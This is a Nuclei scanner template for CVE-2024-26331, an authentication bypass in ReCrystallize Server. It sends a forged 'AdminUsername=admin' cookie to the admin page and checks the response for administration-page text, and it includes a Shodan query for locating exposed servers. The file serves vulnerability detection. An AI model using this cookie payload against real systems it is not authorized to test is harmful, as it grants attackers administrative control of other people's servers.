id: CVE-2024-26331 info: name: ReCrystallize Server - Authentication Bypass author: Carson Chan severity: high description: | This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. reference: - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ - https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ - https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm - https://github.com/Ostorlab/KEV classification: epss-score: 0.00053 epss-percentile: 0.21091 metadata: verified: true max-request: 1 shodan-query: title:"ReCrystallize" tags: cve,recrystallize,auth-bypass,cve2024 http: - method: GET path: - "{{BaseURL}}/Admin/Admin.aspx" headers: Cookie: "AdminUsername=admin" matchers-condition: and matchers: - type: word part: body words: - "ReCrystallize Server Administration" - "License Status:" - "System Info" condition: and - type: status status: - 200 # digest: 490a0046304402200f98d8732efab432fb4a5776fb0cffdfa3bab1be29596883a3f08213b7a32c77022051ca3c0c66461b6fb3cb1c9ccbd1040c30467f4e59e830fd2bdc7f88370b331e:922c64590222798bb761d5b6d8e72950